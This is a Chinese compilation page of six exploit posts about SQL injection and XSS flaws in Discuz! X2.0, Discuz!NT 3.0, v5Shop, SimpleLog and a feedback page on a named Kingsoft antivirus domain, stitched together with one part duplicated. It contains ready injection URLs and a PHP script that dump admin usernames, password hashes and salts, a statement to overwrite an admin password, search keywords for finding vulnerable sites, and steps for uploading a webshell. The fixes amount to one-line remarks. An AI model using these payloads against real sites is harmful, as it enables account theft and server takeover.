以下是小编帮大家整理的Discuz! X2.0 SQL多个注入漏洞及修复,本文共6篇,仅供参考,欢迎大家阅读。

篇1:Discuz! X2.0 SQL多个注入漏洞及修复
DZ2.0直接暴管理账号密码(默认前缀的情况下)
/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V
sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd
29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGl
rZSAnYWRtaW58eHx5%3D
base64解码
1′ and 1=2 union all select 1,group_concat(username,0x7C3274747C,password)
from pre_common_member where username like ‘admin|x|y
如果不是默认前缀
暴前缀EXP
/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V
sZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMR
VMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1
FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D
———————–
再贴个PHP的EXP
$host=”www.2cto.com”;
$affuser=”要爆的用户名username”;
echo ‘
echo $host.”forum.php?mod=attachment&findpost=ss&aid=”;
echo urlencode(base64_encode(“1′ and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database and TABLE_NAME like ‘%_member|x|y”));
echo ‘” target=”_blank”>爆前缀’;
echo “”;
echo ‘
echo $host.”forum.php?mod=attachment&findpost=ss&aid=”;
echo urlencode(base64_encode(“1′ and 1=2 union all select 1,group_concat(username,0x7C,password,0x7C,salt) from pre_ucenter_members where username like ‘$affuser|x|y”));
echo ‘” target=”_blank”>爆password,salt’;
?>
修复:官方已经昨天提供了安全升级不定,及时升级
篇2:金山毒霸多个sql注入及XSS漏洞和修复
第一个
简要描述:由于变量过滤不严产生SQL注入漏洞 可通过入侵手段 拿到站点权限
详细说明:labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2
漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1
labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=2
结果明显不同 注入漏洞产生
修复方案:过滤变量app
第二个
简要描述:过滤不严导致存在SQL注入
详细说明:过滤不严导致存在SQL注入 有机会拿下服务器权限
漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5%20and%201=2%20union%20select%201,2,version(),4,5,user(),database(),8,9--
labs.duba.net/robots.txt
未作进一步测试
修复方案:过滤参数
第三个:
简要描述:留言处过滤不严 造成跨站漏洞
详细说明:留言处过滤不严 造成跨站漏洞
漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5
留言处输入:
修复方案:严格过滤
篇3:金山毒霸多个sql注入及XSS漏洞和修复
金山毒霸多个sql注入及XSS漏洞和修复,需要的朋友可以参考下,
第一个
简要描述:由于变量过滤不严产生SQL注入漏洞 可通过入侵手段 拿到站点权限
详细说明:labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2
漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1
labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=2
结果明显不同 注入漏洞产生
修复方案:过滤变量app
第二个
简要描述:过滤不严导致存在SQL注入
详细说明:过滤不严导致存在SQL注入 有机会拿下服务器权限
漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5%20and%201=2%20union%20select%201,2,version,4,5,user(),database(),8,9--
labs.duba.net/robots.txt
未作进一步测试
修复方案:过滤参数
第三个:
简要描述:留言处过滤不严 造成跨站漏洞
详细说明:留言处过滤不严 造成跨站漏洞
漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5
篇4:v5Shop注入漏洞及修复
/commond.aspx?id=1869
没办法union,只能让它暴错了
暴管理员用户名:/commond.aspx?id=1869 and 1=(select top 1 [name] from web_admin)--
暴管理员密 码:/commond.aspx?id=1869 and 1=(select top 1 [pass] from web_admin)--
过滤了单引号.只能把字符串转化成16进制的了
更新管理员密码:update web_admin set
pass=0x310046004100450037004200450041004300460035003600330041003200430042
004400450037004400450041003600340042003700430037004300
weblogin/System_Config_Operate.aspx
后台上传水印.可以直接上传大马.
拿webshell
切记.千万不要传ASPX的马......不然不会成功的.
你可以先传ASP的马..再传ASPX马.
马的路径为:uploadFile/Picture/木马.asp
关键字:services.aspxid=
inurl:scoreindex.aspx
默认后台地址:weblogin/Login.aspx
/weblogin/index.aspx
复制这段代码 域名+代码
cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --
更新管理员密码:update web_admin setpass=0x310042004600410045003700420045004100430046003500360032003300410032004300420044
00450037004400450041003600340042003700430037004300
weblogin/System_Config_Operate.aspx
后台上传水印.可以直接上传大马.
后台拿webshell
切记.不要传ASPX的马......不然不会成功的.
你可以先传ASP的马..再传ASPX马.
马的路径为:uploadFile/Picture/木马.asp
文章作者:黑面小窝
修复:对照过滤
篇5:simplelog v1.3.1 注入漏洞及修复
Simple-Log是基于PHP+MySQL的开源免费博客系统,系统轻巧运行速度飞快并具有很好的可扩展性.
程序下载地址:html“>/ym/04/27199.html
----------------------------------------------
刚买到vps,打算装个blog系统,看到simple-log比较简洁,就下了最新的装了,,
simplelog v1.3.1 注入漏洞及修复
,
谁知道,偶刚装好,到前台看到搜索就搜了下,没想到真有洞,urldecode惹的祸。
试了下,真可以爆啊,无语了。
再上一张图吧,数据依然可以爆掉。
作者:tojen
篇6:Discuz!NT 3.0 SQL注入漏洞
对Discuz nT3.0进行了分析,发现spacemanage.aspx页面存在一个注入漏洞,
该页面位置:dnt3_src\dnt3\Discuz.Web\space\Admin
代码如下:
复制代码
public void BindData()
{
DataGrid1.AllowCustomPaging = true;
string username = Username.Text;
//string dateStart = joindateStart.SelectedDate.ToString().IndexOf(”1900“) >= 0 ? ”“ : joindateStart.SelectedDate.ToString();
//string dateEnd = joindateEnd.SelectedDate.AddDays(1).ToString().IndexOf(”1900“) >= 0 ? ”“ : joindateEnd.SelectedDate.AddDays(1).ToString();
string dateStart = joindateStart.SelectedDate.ToString();
string dateEnd = joindateEnd.SelectedDate.AddDays(1).ToString().IndexOf(”1900") >= 0 ? DateTime.Now.AddDays(1).ToString() : joindateEnd.SelectedDate.AddDays(1).ToString();
DataGrid1.VirtualItemCount = DbProvider.GetInstance().GetSpaceRecordCount(username, dateStart, dateEnd);
DataGrid1.DataSource = buildGridData(username,dateStart,dateEnd);
DataGrid1.DataBind();
}
对USERNAME 进行跟踪,发现未对该参数进行任何过滤,
Discuz!NT 3.0 SQL注入漏洞
,
存在SQL注入漏洞。
本人未对该漏洞进行测试,如果有人测试完证明确实存在请及时联系官方。
★Discuz!7.07.2后台settings.inc.php中写shell漏洞
★阿曼达企业网站系统 cookie 注入漏洞0day漏洞预警
★启航企业建站系统 cookie注入漏洞通杀所有版本漏洞预警
文档为doc格式